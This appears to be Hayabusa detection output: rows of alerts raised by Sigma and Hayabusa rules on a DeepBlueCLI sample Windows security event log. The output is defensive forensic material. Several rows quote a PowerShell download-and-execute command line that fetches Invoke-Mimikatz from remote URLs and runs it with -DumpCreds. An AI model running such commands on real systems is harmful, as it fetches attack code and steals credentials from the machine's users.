0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.319 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.397 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:37.371 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:37.402 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:01:09.840 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:10:18.012 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:46:13.438 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:46:13.445 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:54.267 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:54.269 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:55.299 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:55.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:45:05.616 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 22:11:54.571 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 23:12:04.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 23:21:01.785 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:09:17.586 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:10:55.594 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 02:00:00.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 02:01:59.600 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 03:05:36.607 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:00:34.614 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:15:14.072 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:15:14.084 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.759 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.766 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.766 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.851 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.855 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.219 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.496 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.883 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.960 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.771 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.785 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:04:25.540 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:12:55.760 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:12:55.760 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.352 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.352 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.506 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.506 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.699 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.699 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.794 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:57.533 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:57.542 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:26:10.013 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 